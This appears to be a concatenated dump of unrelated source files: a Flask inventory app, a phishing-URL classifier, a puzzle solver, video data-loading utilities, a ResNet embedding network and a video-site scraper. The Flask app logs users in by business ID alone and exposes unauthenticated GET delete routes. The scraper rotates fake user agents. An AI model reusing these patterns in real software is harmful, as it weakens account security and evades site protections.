"SELECT qty FROM warehouse WHERE loc_id = ? AND prod_id = ? AND b_id = ?",
(location, product_id, b_id,),
).fetchone()[0]
newquantity = ogquantity + quantity
query = "UPDATE warehouse SET qty = ? WHERE loc_id = ? AND prod_id = ? AND b_id = ?"
db.execute(query, (newquantity, location, product_id, b_id,))
db.commit()
else:
db.execute(
"INSERT INTO warehouse (b_id, prod_id, qty, loc_id) values (?, ?, ?, ?)",
(b_id, product_id, quantity, location),
)
db.commit()
def balance_quantity(quantity, product_id, location):
""" Used by the product route to add or subtract quantity of a product."""
db = get_db()
if location == "product_factory":
ogquantity = db.execute(
"SELECT quantity from product WHERE product_id = ?", (product_id,)
).fetchone()
ogquantity = ogquantity["quantity"]
newquantity = ogquantity + quantity
if int(newquantity) < 0:
raise Exception("Invalid quantity.")
query = "UPDATE product SET quantity = ? where product_id = ?"
db.execute(query, (newquantity, product_id))
db.commit()
@bp.route("/<id>/delete", methods=("GET",))
def delete(id):
""" Used by the product page to delete a product. Doesn't actually delete it, just sets the quantity to 0. """
db = get_db()
b_id = session.get("user_id")
query = "UPDATE product SET quantity = 0 WHERE product_id = ? AND for_business = ?"
db.execute(query, (id, b_id,))
db.commit()
return redirect(url_for("main.products"))
@bp.route("/")
def root():
return redirect(url_for("main.products"))
@bp.route("/products", methods=("GET", "POST"))
@login_required
def products():
""" The product route. """
db = get_db() # Get the database connection.
b_id = session.get("user_id")
error = None
# Request to add/update a product to the product table.
if request.method == "POST":
if "submit_product" in request.form:
try:
prod_id = request.form["insert_product_id"]
prod_name = request.form["insert_product_name"]
prod_qty = int(request.form["insert_product_qty"])
if prod_qty < 0:
raise Exception("Invalid quantity.")
db.execute(
"INSERT INTO product (product_id, product_name, quantity, for_business) values (?, ?, ?, ?)",
(prod_id, prod_name, prod_qty, b_id,),
)
db.commit()
except Exception as e:
if "UNIQUE constraint failed" in str(e):
error = "Error adding product: A product with that ID already exists or has been created before."
elif "invalid literal for int() with base 10:" in str(e):
error = "Invalid quantity."
else:
error = str(e)
return render_template(
"products.html",
title="Products",
products=product_list(b_id),
error=error,
)
if "update_product" in request.form:
try:
prod_selected = request.form["select_product"].split(",")[0]
prod_name = request.form["update_product_name"]
prod_qty = int(request.form["update_product_qty"])
if prod_name:
query = "UPDATE product SET product_name = ? WHERE product_id = ?"
db.execute(query, (prod_name, prod_selected))
db.commit()
balance_quantity(
prod_qty, prod_selected, location="product_factory",
)
db.commit()
except Exception as e:
if "invalid literal for int() with base 10:" in str(e):
error = "Invalid quantity."
else:
error = str(e)
return render_template(
"products.html",
title="Products",
products=product_list(b_id),
error=error,
)
else:
pass
# Retrieve and display products on the page.
prod_list = product_list(b_id)
return render_template(
"products.html", products=prod_list, title="Products", error=error
)
@bp.route("/<lid>/deleteloc", methods=("GET",))
def delete_loc(lid):
""" Used by the location page to delete a location. Also deletes any products at that location. """
db = get_db()
b_id = session.get("user_id")
db.execute(
"DELETE FROM location WHERE location_id = ? AND for_business = ?", (lid, b_id,)
)
db.commit()
db.execute("DELETE FROM warehouse WHERE loc_id = ? AND b_id = ?", (lid, b_id,))
db.commit()
return redirect(url_for("main.locations"))
@bp.route("/locations", methods=("GET", "POST"))
@login_required
def locations():
""" The location route. """
db = get_db() # Get the database connection
b_id = session.get("user_id")
error = None
# Request to add a location to the location table.
if request.method == "POST":
if "submit_location" in request.form:
try:
loc_id = request.form["insert_location_id"]
loc_name = request.form["insert_location_name"]
db.execute(
"INSERT INTO location (location_id, location_name, for_business) values(?, ?, ?)",
(loc_id, loc_name, b_id,),
)
db.commit()
except Exception as e:
if "UNIQUE constraint failed:" in str(e):
error = "Location with that ID already exists."
else:
error = str(e)
location_list = db.execute(
"SELECT location_id, location_name FROM location where for_business = ?",
(b_id,),
).fetchall()
return render_template(
"locations.html",
title="Locations",
locations=location_list,
error=error,
)
if "update_location" in request.form:
try:
loc_selected = request.form["select-location"].split(",")[0]
new_locname = request.form["location-name-update"]
db.execute(
"UPDATE location SET location_name = ? WHERE location_id = ?",
(new_locname, loc_selected,),
)
db.commit()
except Exception as e:
error = str(e)
location_list = db.execute(
"SELECT location_id, location_name FROM location where for_business = ?",
(b_id,),
).fetchall()
return render_template(
"locations.html",
title="Locations",
locations=location_list,
error=error,
)
else:
pass
# Retrieve locations and render the page.
location_list = db.execute(
"SELECT location_id, location_name FROM location where for_business = ?",
(b_id,),
).fetchall()
return render_template(
"locations.html", title="Locations", locations=location_list, error=error
)
def check_warehouse():
""" Returns a list of location IDs which has products stored """
db = get_db()
b_id = session.get("user_id")
query = "SELECT loc_id FROM warehouse where b_id = ?"
warehouses = db.execute(query, (b_id,)).fetchall()
loc_list = []
for lids in warehouses:
if lids[0] not in loc_list:
loc_list.append(lids[0])
return loc_list
@bp.route("/_loadproducts/<lid>", methods=("GET",))
def loadproducts(lid):
""" Used by the movement page to retrieve products at a particular location. """
db = get_db()
b_id = session.get("user_id")
product_list = {}
if lid == "Products":
query = "SELECT product_id, product_name FROM product WHERE for_business = ? AND quantity > 0"
warehouses = db.execute(query, (b_id,)).fetchall()
for products in warehouses:
product_list[products[0]] = products[1]
else:
query = "SELECT prod_id FROM warehouse where loc_id = ? AND b_id = ?"
warehouses = db.execute(query, (lid, b_id,)).fetchall()
for products in warehouses:
product_name = db.execute(
"SELECT product_name FROM product WHERE product_id = ? AND for_business = ?",
(products["prod_id"], b_id,),
).fetchone()
product_list[products["prod_id"]] = product_name["product_name"]
return jsonify(product_list)
@bp.route("/_getquantity/<prd>/<loc>", methods=("GET",))
def getquantity(prd, loc):
""" Used by the movement page to get the quantity of a product."""
db = get_db()
b_id = session.get("user_id")
qty = {}
if loc == "Products":
if prd != "None":
q = db.execute(
"SELECT quantity FROM product WHERE product_id = ? AND for_business = ?",
(prd, b_id,),
).fetchone()
qty["qty"] = str(q["quantity"])
else:
pass
else:
q = db.execute(
"SELECT qty FROM warehouse WHERE prod_id = ? AND b_id = ? AND loc_id = ?",
(prd, b_id, loc,),
).fetchone()
qty["qty"] = str(q["qty"])
return qty
def products_at_locations():
""" Creates a dictionary with loc IDs as keys and products stored there as values """
db = get_db()
b_id = session.get("user_id")
locs = check_warehouse()
warehouse = {}
for ids in locs:
l = []
prods = db.execute(
"SELECT prod_id, qty FROM warehouse where b_id = ? AND loc_id = ?",
(b_id, ids,),
).fetchall()
locname = db.execute(
"SELECT location_name FROM location WHERE location_id = ? AND for_business = ?",
(ids, b_id,),
).fetchone()["location_name"]
for data in prods:
prodname = db.execute(
"SELECT product_name FROM product WHERE for_business = ? AND product_id = ?",
(b_id, data["prod_id"],),
).fetchone()["product_name"]
l.append([data["prod_id"] + " " + prodname, data["qty"]])
warehouse[locname] = l
return warehouse
def logmovements(
movement_id, from_location, to_location, prod_id, qty,
):
db = get_db()
b_id = session.get("user_id")
if from_location == "Products":
from_location = "Products"
if to_location == "Move out":
to_location = "MO"
db.execute(
"INSERT INTO movement (movement_id, from_location, to_location, prod_id, qty, b_id)"
"VALUES (?, ?, ?, ?, ?, ?)",
(movement_id, from_location, to_location, prod_id, qty, b_id,),
)
db.commit()
@bp.route("/movement", methods=("GET", "POST",))
@login_required
def movements():
""" Movement route. """
db = get_db()
b_id = session.get("user_id")
error = None
if request.method == "POST":
# movement request - move product to a location
try:
move_from = request.form["select-location"].split(",")[0]
product_id = request.form["choose-product"].split(",")[0]
quantity = int(request.form["quantity"])
move_to = request.form["move-to"].split(",")[0]
if quantity < 0:
raise Exception("Invalid quantity.")
if move_from == "Products":
moveid = "P-"
product_array = get_product("product_factory", product_id, quantity)
else:
moveid = move_from + "-"
product_array = get_product(move_from, product_id, quantity)
set_product(move_to, product_array)
if move_to == "Move out":
moveid += "MO"
else:
moveid += move_to
logmovements(moveid, move_from, move_to, product_id, quantity)
prod_list = product_list(b_id)
move_to = db.execute(
"SELECT location_id, location_name FROM location WHERE for_business = ?",
(b_id,),
).fetchall()
warehouses = check_warehouse()
movefrom_list = []
for lids in warehouses:
query = "SELECT location_id, location_name FROM location where location_id = ?"
l_list = db.execute(query, (lids,)).fetchone()
movefrom_list.append(l_list)
locations_with_products = products_at_locations()
return render_template(
"movement.html",
title="Movement",
movefrom=movefrom_list,
products=prod_list,
moveto=move_to,
locationmap=locations_with_products,
error=error,
)
except Exception as e:
if "'NoneType' object is not subscriptable" in str(e):
error = "Error moving: Invalid product."
else:
error = "Error moving: " + str(e)
# Retrieve products from the products table
prod_list = product_list(b_id)
# Retrieve all locations
move_to = db.execute(
"SELECT location_id, location_name FROM location WHERE for_business = ?",
(b_id,),
).fetchall()
# Get all locations which have products stored.
warehouses = check_warehouse()
# Creates a list of those locations along with their names.
movefrom_list = []
for lids in warehouses:
query = "SELECT location_id, location_name FROM location where location_id = ?"
l_list = db.execute(query, (lids,)).fetchone()
movefrom_list.append(l_list)
locations_with_products = products_at_locations()
return render_template(
"movement.html",
title="Movement",
movefrom=movefrom_list,
products=prod_list,
moveto=move_to,
locationmap=locations_with_products,
error=error,
)
@bp.route("/movementlogs", methods=("GET", "POST",))
@login_required
def movementlogs():
""" Movement logs route. """
db = get_db()
b_id = session.get("user_id")
logtable = db.execute("SELECT * FROM movement WHERE b_id = ?", (b_id,)).fetchall()
business_name = db.execute(
"SELECT business_name FROM business WHERE business_id = ?", (b_id,)
).fetchone()
return render_template(
"movementlogs.html",
logtable=logtable,
business_name=business_name,
title="Logs",
)
@bp.route("/logout")
def logout():
session.clear()
return redirect(url_for("start.index"))
```
#### File: inv-man/invman/start.py
```python
import functools
from flask import Blueprint, render_template, request, url_for, flash, redirect, session, g
from invman.db import get_db
bp = Blueprint('start', __name__)
@bp.route('/', methods=('GET', 'POST'))
def index():
db = get_db()
error = None
if g.user:
return redirect(url_for('main.products'))
if request.method == 'POST':
if 'login' in request.form:
business_id = request.form['registered_b_id']
business = db.execute('SELECT * FROM business WHERE business_id = ?', (business_id,)).fetchone()
if business:
session.clear()
session['user_id'] = business['business_id']
g.user = get_db().execute('SELECT * FROM business WHERE business_id = ?', (business_id,)).fetchone()
return redirect(url_for('main.products'))
else:
error = 'Incorrect ID'
flash(error)
elif 'register' in request.form:
new_business_id = request.form['create_b_id']
new_business_name = request.form['create_b_name']
if new_business_id and new_business_name:
business_exists = db.execute('SELECT * FROM business WHERE business_id = ?', (new_business_id,)).fetchone()
if not business_exists:
db.execute('INSERT INTO business (business_id, business_name) VALUES (?, ?)', (new_business_id, new_business_name))
db.commit()
return redirect(url_for('start.created'))
else:
error = 'Business ID already exists'
else:
error = 'Please enter a business ID and Name'
flash(error)
return render_template('index.html', title='Home')
@bp.before_app_request
def load_logged_in_user():
user_id = session.get('user_id')
if user_id is None:
g.user = None
else:
g.user = get_db().execute(
'SELECT * FROM business WHERE business_id = ?', (user_id,)
).fetchone()
@bp.route('/created')
def created():
return '<h5>Business Created</h5><br>You can now <a href="/">login</a>'
def login_required(view):
@functools.wraps(view)
def wrapped_view(**kwargs):
if g.user is None:
return redirect(url_for('start.index'))
return view(**kwargs)
return wrapped_view
``` |
{
"source": "7zones/Phishing-detection-ML",
"score": 3
} |
#### File: 7zones/Phishing-detection-ML/model.py
```python
from tensorflow.keras.layers import Embedding, Flatten, Dense, LSTM, Bidirectional, Dropout, BatchNormalization, GRU, Conv1D, GlobalAveragePooling1D, GlobalMaxPooling1D
from tensorflow.keras.models import Sequential, Model
import tensorflow as tf
class ConvModel(tf.keras.Model):
def __init__(self, num_chars, embedding_vector_length, maxlen):
super(ConvModel, self).__init__()
#model
self.embedding_layers = tf.keras.layers.Embedding(num_chars, embedding_vector_length, input_length=maxlen)
self.conv = tf.keras.layers.Conv1D(256, 4, activation='relu')
self.fc1 = tf.keras.layers.Dense(128, activation = "relu")
self.fc = tf.keras.layers.Dense(1, activation = "sigmoid")
def call(self, inputs, training=False):
embedding = self.embedding_layers(inputs)
conv = self.conv(embedding)
conv_max = tf.reduce_max(conv, axis = 1)
fc1 = self.fc1(conv_max)
output = self.fc(fc1)
return output
``` |
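A quick smoke test of the model above; the vocabulary size, embedding width and sequence length are made-up values, and the class is assumed to live in `model.py` as shown.
```python
import tensorflow as tf

from model import ConvModel  # assuming the file above is saved as model.py

# hypothetical hyper-parameters, for illustration only
num_chars, embedding_vector_length, maxlen = 100, 32, 150

model = ConvModel(num_chars, embedding_vector_length, maxlen)

# a batch of 4 integer-encoded URLs, each padded/truncated to maxlen characters
batch = tf.random.uniform((4, maxlen), minval=0, maxval=num_chars, dtype=tf.int32)
probs = model(batch)   # sigmoid outputs in [0, 1], shape (4, 1)
print(probs.shape)
```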
{
"source": "80085/professorspelet",
"score": 4
} |
#### File: professorspelet/professorspelet/professorspelet.py
```python
import copy
class Puzzle:
"""
Professorspelet consists of a 4x4 grid that shall be filled with tiles,
each of which has 4 body parts in different colors on each edge.
The tiles must be place in such a way that all edges must create one
complete Professor.
"""
def __init__(self, tiles: list):
"""
Initialize a puzzle with a list of tiles that shall be placed. The list can be empty or
contain only a few Professors, but must not exceed 16.
"""
if len(tiles) > 16:
raise ValueError(f'Maximum number of Professor tiles that can be placed is 16, was: {len(tiles)}')
self.grid = [None] * 16
self._solve(copy.deepcopy(tiles))
def solution(self):
"""
Return a list of tiles placement for a valid solution. The tiles are indexed 0-15 and should be placed
starting from top left corner with a column width of 4.
"""
return [(e, str(tile)) for e, tile in enumerate(self.grid) if tile is not None]
def _solve(self, tiles: list, current_index: int=0):
if not tiles:
return True
        for tile in list(tiles):  # iterate over a snapshot; the list itself is mutated below
for i in range(4):
if self._can_place_tile(tile, current_index):
self.grid[current_index] = tile
tiles.remove(tile)
if self._solve(tiles, current_index + 1):
return True
self.grid[current_index] = None
tiles.append(tile)
tile.rotate()
return False
def _can_place_tile(self, tile, ind):
if self.grid[ind] is not None:
raise ValueError(f'Index={ind} is not empty')
if ind > 3:
other = self.grid[ind - 4]
if other is not None and not other.bottom().matches(tile.top()):
return False
if ind < 12:
other = self.grid[ind + 4]
if other is not None and not other.top().matches(tile.bottom()):
return False
if ind % 4 != 0:
other = self.grid[ind - 1]
if other is not None and not other.right().matches(tile.left()):
return False
if ind % 4 != 3:
other = self.grid[ind + 1]
if other is not None and not other.left().matches(tile.right()):
return False
return True
class Tile:
"""
A tile consisting of four professor halves - two upper and two lower
"""
def __init__(self, professors):
"""
Create a card with four professors, starting at the top in a clockwise direction
"""
if len(professors) != 4:
raise ValueError('Expected four professor parts')
bodies = list(map(lambda x: x.body, professors))
if bodies.count('upper') != bodies.count('lower'):
raise ValueError('Expected equal number of upper and lower body parts')
self.professors = professors
self.rotation = 0
def __str__(self):
return f'Top: {self.top()}, Right: {self.right()}, Bottom: {self.bottom()}, Left: {self.left()}'
def top(self):
"""
Get the professor in top position
"""
return self.professors[self.rotation % 4]
def right(self):
"""
Get the professor in right position
"""
return self.professors[(self.rotation + 1) % 4]
def bottom(self):
"""
Get the professor in bottom position
"""
return self.professors[(self.rotation + 2) % 4]
def left(self):
"""
Get the professor in left position
"""
return self.professors[(self.rotation + 3) % 4]
def rotate(self, steps=1) -> None:
"""
Rotate this tile a number of steps clockwise.
Number may be negative to indicate counter clockwise.
"""
self.rotation -= steps
class Professor:
"""
Representation of a professor who consists of a body half in a particular color
"""
_VALID_BODY_PARTS = ['upper', 'lower']
_VALID_COLORS = ['blue', 'purple', 'green', 'brown']
def __init__(self, body, color):
if body.lower() not in Professor._VALID_BODY_PARTS:
raise ValueError(f'Invalid body part {body}. Valid alternatives: {Professor._VALID_BODY_PARTS}')
if color.lower() not in Professor._VALID_COLORS:
raise ValueError(f'Invalid color {color}. Valid alternatives: {Professor._VALID_COLORS}')
self.body = body.lower()
self.color = color.lower()
def __str__(self):
return f'{self.body} - {self.color}'
def matches(self, professor) -> bool:
"""
Test if a professor can be placed next to another one
by comparing body parts and color.
"""
return self.body != professor.body and self.color == professor.color
``` |
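A tiny illustration of the API with a single tile rather than the full 16-tile game, just to show how `Professor`, `Tile` and `Puzzle` fit together (the import path is assumed from the file location):
```python
from professorspelet.professorspelet import Professor, Tile, Puzzle

tile = Tile([
    Professor('upper', 'blue'),    # top
    Professor('lower', 'green'),   # right
    Professor('upper', 'purple'),  # bottom
    Professor('lower', 'brown'),   # left
])

puzzle = Puzzle([tile])            # fewer than 16 tiles is allowed
for index, placement in puzzle.solution():
    print(index, placement)        # e.g. "0 Top: upper - blue, Right: ..."
```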
{
"source": "804173948/nslt",
"score": 2
} |
#### File: nslt/utils/iterator_utils.py
```python
from __future__ import print_function
import collections
from os import listdir
from os.path import isfile, join
import numpy as np
import cv2
import tensorflow as tf
__all__ = ["BatchedInput", "get_iterator", "get_infer_iterator"]
# NOTE(ebrevdo): When we subclass this, instances' __dict__ becomes empty.
class BatchedInput(collections.namedtuple("BatchedInput",
("initializer",
"source",
"target_input",
"target_output",
"source_sequence_length",
"target_sequence_length"))):
pass
# Inference iterator (source videos only, no targets)
def get_infer_iterator(src_dataset,
source_reverse,
src_max_len=None):
# Get number of Frames
src_dataset = src_dataset.map(lambda src: (src, tf.py_func(get_number_of_frames, [src], tf.int32)))
# Filter Out Samples
src_dataset = src_dataset.filter(lambda src, src_len: tf.logical_and(src_len > 0, src_len < src_max_len))
src_dataset = src_dataset.map(lambda src, src_len:
                                  (tf.reshape(  # reshape to a fixed number of frames
                                      tf.pad(  # zero-pad up to src_max_len frames
                                          tf.py_func(  # decode the video with OpenCV
read_video, [src, source_reverse], tf.float32
),
[[0, src_max_len - src_len], [0, 0], [0, 0], [0, 0]],
"CONSTANT"
),
[300, 227, 227, 3]
),
tf.reshape(src_len, [1])))
batched_iter = src_dataset.make_initializable_iterator()
(src_video, src_seq_len) = batched_iter.get_next()
return BatchedInput(initializer=batched_iter.initializer,
source=src_video,
target_input=None,
target_output=None,
source_sequence_length=src_seq_len,
target_sequence_length=None)
"""
def get_number_of_frames(src):
return np.int32(len([f for f in listdir(src) if isfile(join(src, f))]))
def read_video(src, source_reverse):
images = sorted([f for f in listdir(src) if isfile(join(src, f))])
video = np.zeros((len(images), 227, 227, 3)).astype(np.float32)
# Cihan_CR: Harcoded Path, Need to Change This
mean_image = np.load('../Mean/FulFrame_Mean_Image_227x227.npy').astype(np.float32)[..., ::-1]
# for each image
for i in range(0, len(images)):
video[i, :, :, :] = cv2.imread(src + images[i]).astype(np.float32) - mean_image
if source_reverse:
video = np.flip(video, axis=0)
return video
"""
def get_number_of_frames(src):
""" get the number of frames of video at path src.
Args:
src (bytes): path of the video. Its format like: '~/path/to/video/file.avi'
Returns:
numpy.int32: number of frames
"""
if isinstance(src, bytes):
src = src.decode('utf-8')
fps = 10 # custom fps
cap = cv2.VideoCapture(src)
assert cap.isOpened()
# calculate sample_factor to reset fps
    old_fps = cap.get(cv2.CAP_PROP_FPS)  # original frame rate of the source video
sample_factor = int(old_fps / fps)
# calculate new number of frames at given fps
num_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
new_num_frames = int(num_frames / sample_factor)
cap.release()
return np.int32(new_num_frames)
def read_video(src, source_reverse):
"""
read video to numpy.ndarray (L x H x W x C)
Args:
src (bytes): path of the video. Its format like: '~/path/to/video/file.avi'
source_reverse (bool): whether to reverse the video sequence
Returns:
numpy.ndarray: Video (L x H x W x C)
"""
print('read_video:')
print(src)
if isinstance(src, bytes):
src = src.decode('utf-8')
fps = 10 # custom fps
# open video file
cap = cv2.VideoCapture(src)
assert cap.isOpened()
# calculate sample_factor to reset fps
old_fps = cap.get(cv2.CAP_PROP_FPS) # fps of video
sample_factor = int(old_fps / fps)
assert sample_factor >= 1
# init empty output frames (L x H x W x C)
num_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
num_frames = int(num_frames / sample_factor)
video = np.zeros((num_frames, 227, 227, 3)).astype(np.float32)
for index in range(num_frames):
frame_index = sample_factor * index
# read frame
cap.set(cv2.CAP_PROP_POS_FRAMES, frame_index)
ret, frame = cap.read()
assert ret
# successfully read frame
# BGR to RGB
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
# resize frame to (227, 227)
frame = cv2.resize(frame, (227, 227))
# map pixels to [0, 1]
frame = (frame / 255).astype('float32')
video[index, :, :, :] = frame
cap.release()
if source_reverse:
video = np.flip(video, axis=0)
return video
def get_iterator(src_dataset,
tgt_dataset,
tgt_vocab_table,
sos,
eos,
source_reverse,
random_seed,
src_max_len=None,
tgt_max_len=None,
num_threads=4,
output_buffer_size=None,
skip_count=None):
# Cihan_CR: Hard Codded - Need to Change this
# if not output_buffer_size:
# output_buffer_size = 10 # batch_size * 1000
output_buffer_size = 10
tgt_sos_id = tf.cast(tgt_vocab_table.lookup(tf.constant(sos)), tf.int32)
tgt_eos_id = tf.cast(tgt_vocab_table.lookup(tf.constant(eos)), tf.int32)
# Concat Datasets
src_tgt_dataset = tf.contrib.data.Dataset.zip((src_dataset, tgt_dataset))
# Skip Data
if skip_count is not None:
src_tgt_dataset = src_tgt_dataset.skip(skip_count)
# Shuffle Samples: You must do it as early as possible
src_tgt_dataset = src_tgt_dataset.shuffle(output_buffer_size * 1000, random_seed)
# Get number of frames from videos
src_tgt_dataset = src_tgt_dataset.map(lambda src, tgt:
(src, tgt, tf.py_func(get_number_of_frames, [src], tf.int32)),
num_threads=num_threads, output_buffer_size=output_buffer_size)
# Split Translation into Tokens
src_tgt_dataset = src_tgt_dataset.map(lambda src, tgt, src_len:
(src, tf.string_split([tgt]).values, src_len),
num_threads=num_threads, output_buffer_size=output_buffer_size)
# Sequence Length Checks
src_tgt_dataset = src_tgt_dataset.filter(lambda src, tgt, src_len: tf.logical_and(src_len > 0, tf.size(tgt) > 0))
src_tgt_dataset = src_tgt_dataset.filter(lambda src, tgt, src_len: tf.logical_and(src_len < src_max_len, tf.size(tgt) < tgt_max_len))
# Convert Tokens to IDs
src_tgt_dataset = src_tgt_dataset.map(lambda src, tgt, src_len:
(src, tf.cast(tgt_vocab_table.lookup(tgt), tf.int32), src_len),
num_threads=num_threads, output_buffer_size=output_buffer_size)
# Create Input and Output for Target
src_tgt_dataset = src_tgt_dataset.map(lambda src, tgt, src_len:
(src,
tf.concat(([tgt_sos_id], tgt), 0),
tf.concat((tgt, [tgt_eos_id]), 0),
src_len),
num_threads=num_threads, output_buffer_size=output_buffer_size)
# Get Target Sequence Length
src_tgt_dataset = src_tgt_dataset.map(lambda src, tgt_in, tgt_out, src_len:
(src, tgt_in, tgt_out, src_len, tf.size(tgt_in)),
num_threads=num_threads, output_buffer_size=output_buffer_size)
# Pad Target Sequence With 0s
# src_tgt_dataset = src_tgt_dataset.map(lambda src, tgt_in, tgt_out, src_len, tgt_len:
# (src,
# tf.pad(tgt_in, [[0, tgt_max_len - tgt_len]], "CONSTANT"),
# tf.pad(tgt_out, [[0, tgt_max_len - tgt_len]], "CONSTANT"),
# src_len,
# tgt_len),
# num_threads=num_threads, output_buffer_size=output_buffer_size)
# Read and Pad Source Video from source path
src_tgt_dataset = src_tgt_dataset.map(lambda src, tgt_in, tgt_out, src_len, tgt_len:
# src_video
                                          (tf.reshape(  # reshape to a fixed number of frames
                                              tf.pad(  # zero-pad up to src_max_len frames
                                                  tf.py_func(  # decode the video with OpenCV
read_video, [src, source_reverse], tf.float32
),
[[0, src_max_len - src_len], [0, 0], [0, 0], [0, 0]],
"CONSTANT"
),
[300,227,227,3]
),
# tgt_input_ids
tf.expand_dims(tgt_in, 0),
# tgt_output_ids
tf.expand_dims(tgt_out, 0),
# src_seq_len
tf.reshape(src_len, [1]),
# tgt_seq_len
tf.reshape(tgt_len, [1])),
num_threads=num_threads, output_buffer_size=output_buffer_size)
# Create Initializer
batched_iter = src_tgt_dataset.make_initializable_iterator()
# Get Next Function
src_video, tgt_input_ids, tgt_output_ids, src_seq_len, tgt_seq_len = batched_iter.get_next()
# Return Input
return BatchedInput(initializer=batched_iter.initializer, source=src_video, target_input=tgt_input_ids,
target_output=tgt_output_ids,
source_sequence_length=src_seq_len, target_sequence_length=tgt_seq_len)
``` |
{
"source": "804463592/triplet-reid-pytorch",
"score": 3
} |
#### File: 804463592/triplet-reid-pytorch/backbone.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision
'''
As goes with pytorch pretrained models, inception_v3 requires the input image sizes to be (299, 299), while input image sizes for other pretrained models to be (224, 224)
'''
class DenseNormReLU(nn.Module):
def __init__(self, in_feats, out_feats, *args, **kwargs):
super(DenseNormReLU, self).__init__(*args, **kwargs)
self.dense = nn.Linear(in_features = in_feats, out_features = out_feats)
self.bn = nn.BatchNorm1d(out_feats)
self.relu = nn.ReLU(inplace = True)
def forward(self, x):
x = self.dense(x)
x = self.bn(x)
x = self.relu(x)
return x
class EmbedNetwork(nn.Module):
def __init__(self, dims = 128, pretrained_base = True, *args, **kwargs):
super(EmbedNetwork, self).__init__(*args, **kwargs)
resnet50 = torchvision.models.resnet50(pretrained_base)
self.base = nn.Sequential(resnet50.conv1,
resnet50.bn1,
resnet50.relu,
resnet50.maxpool,
resnet50.layer1,
resnet50.layer2,
resnet50.layer3,
resnet50.layer4,)
# self.base = torchvision.models.inception_v3(pretrained_base)
self.fc_head = DenseNormReLU(in_feats = 2048, out_feats = 1024)
self.embed = nn.Linear(in_features = 1024, out_features = dims)
def forward(self, x):
x = self.base(x)
_, _, h, w = x.shape
x = F.avg_pool2d(x, (h, w))
x = x.contiguous().view(-1, 2048)
x = self.fc_head(x)
x = self.embed(x)
return x
if __name__ == "__main__":
embed_net = EmbedNetwork(pretrained_base = True)
print(embed_net)
# # in_tensor = torch.randn((15, 3, 299, 299))
# in_tensor = torch.randn((15, 3, 224, 224))
# # print(in_tensor.shape)
# embd = embed_net(in_tensor)
# print(embd.shape)
# print(embed_net.state_dict().keys())
# # print(embed_net.base[0].weight)
# net = torchvision.models.resnet50(False)
# # print(net.conv1.weight)
# print(torch.sum(embed_net.base[0].weight == net.conv1.weight))
# print(embed_net.base[0].weight.shape)
# print(net.conv1.weight.shape)
for i, ly in enumerate(embed_net.base):
print(ly.__class__.__name__)
if i > 4: break
# break
``` |
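A short forward-pass sketch of the network above (pretrained weights disabled so nothing is downloaded; `eval()` avoids batch-norm issues with tiny batches):
```python
import torch

from backbone import EmbedNetwork  # assuming the file above is saved as backbone.py

net = EmbedNetwork(dims=128, pretrained_base=False)
net.eval()

with torch.no_grad():
    images = torch.randn(4, 3, 224, 224)   # a dummy batch of person crops
    embeddings = net(images)
print(embeddings.shape)                     # torch.Size([4, 128])
```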
{
"source": "80491636/thinkPHP_DM",
"score": 3
} |
#### File: 国内视频站/腾讯动漫采集/Main.py
```python
import requests
import re
import sys
import time
import pymysql
import random
from bs4 import BeautifulSoup
# Connect to the database
connect = pymysql.Connect(
host = 'localhost',
port = 3306,
user = 'root',
passwd = '<PASSWORD>',
db = 'blog',
charset = 'utf8'
)
# Get a cursor
cursor = connect.cursor()
class Main:
user_agent_list = ['Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1464.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.16 Safari/537.36',
'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36',
'Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1667.0 Safari/537.36',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:17.0) Gecko/20100101 Firefox/17.0.6',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36',
'Mozilla/5.0 (X11; CrOS i686 3912.101.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36']
UserAgent=random.choice(user_agent_list)
header = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Cache-Control': 'max-age=0',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'User-Agent': UserAgent,
}
def getCateID(self):
for i in range(1,5):
self.getList(i)
def getList(self,iarea):
listpage = 0
for offset in range(0,10000,30):
listpage += 1
            # Open the page
url = "https://v.qq.com/x/bu/pagesheet/list?_all=1&append=1&channel=cartoon&iarea=" + str(iarea) + "&listpage=" + str(listpage) + "&offset=" + str(offset) + "&pagesize=30&sort=18"
try:
r = requests.get(url,headers = self.header)
print("链接状态:",r.status_code," 地址:",url)
except Exception as e:
print("打开链接错误:",e)
continue
            # Parse the page content
soup = BeautifulSoup(r.content,"html.parser")
if(soup.find_all('div', {'class': 'list_item'}) == []):
print('程序采集完成',iarea)
return
            # Iterate over the list items on the page
for items in soup.find_all('div', {'class': 'list_item'}):
                # Thumbnail URL
try:
pic = items.find('img')['src']
except Exception as e:
print("读取缩略图遇到错误",e)
continue
if(pic == ''):
print("没有缩略图 直接跳过")
continue
                # Alternate title
try:
second_title = items.find('div',{'class':'figure_desc'}).text
except Exception as e:
second_title = ""
                # Episode count
try:
sets = items.find('div',{'class':'figure_caption'}).text
except Exception as e:
sets = ''
try:
figure_detail = items.find('div',{'class':'figure_detail'})
except Exception as e:
figure_detail = ''
